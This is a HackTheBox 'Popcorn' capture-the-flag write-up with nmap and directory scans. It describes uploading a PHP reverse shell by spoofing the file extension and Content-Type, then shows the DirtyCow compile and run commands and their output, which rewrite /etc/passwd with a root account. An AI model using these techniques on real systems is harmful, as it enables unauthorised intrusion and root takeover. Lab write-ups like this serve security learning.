ENUMERATION

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

/.htpasswd            (Status: 403) [Size: 287]
/.hta                 (Status: 403) [Size: 282]
/.htaccess            (Status: 403) [Size: 287]
/cgi-bin/             (Status: 403) [Size: 286]
/index                (Status: 200) [Size: 177]
/index.html           (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47032]
Progress: 4082 / 4615 (88.45%)                  [ERROR] 2021/08/04 00:50:59 [!] Get "http://10.10.10.6/server-status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/torrent              (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]

FOOTHOLD

Visiting torrent we see that it is a torrent hoster site so we register ourselves and login . This bog was very useful in exploiting it. Blog Link

So according to this blog after uploading the torrent we edit it and upload a screenshot. I upload a php reverse shell (renamed it from shell.php to shell.png.php) and I intercepted the request using Burpsuite and changed Content-Type header to image/jpeg and forwarded the request. It shows that it has been uploaded successfully.

After that we visit /torrent/uploads and click on our php file to get a reverse shell as www-data. User flag is in /home/george/user.txt

PRIVILEGE ESCALATION

Run the command :

uname -r

and we see that it is running on linux 2.6.31

Searching for an exploit via searchsploit we come across many exploits of dirtycow . So even though I was pretty sure that it was unintended I decided to give it a try ( one of my friends had said just a few days earlier that dirtycow exploit and the recent 2021 sudo exploit will run on most machines , so frankly decided to test his words )

DirtyCow

So I uploaded the C file to the machine via python server and compiled it:

www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@popcorn:/tmp$ ./dirty mango
./dirty mango
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: mango
Complete line:
firefart:fip9QGsrAJUWg:0:0:pwned:/root:/bin/bash

mmap: b7881000

After this unfortunately my (not stabilised) reverse shell got stuck so I had to ssh as user firefart and get the root.txt

Blogs@MaskdMafia

Student and CyberSecurity Enthusiast

HackTheBox - Popcorn

ENUMERATION

FOOTHOLD

PRIVILEGE ESCALATION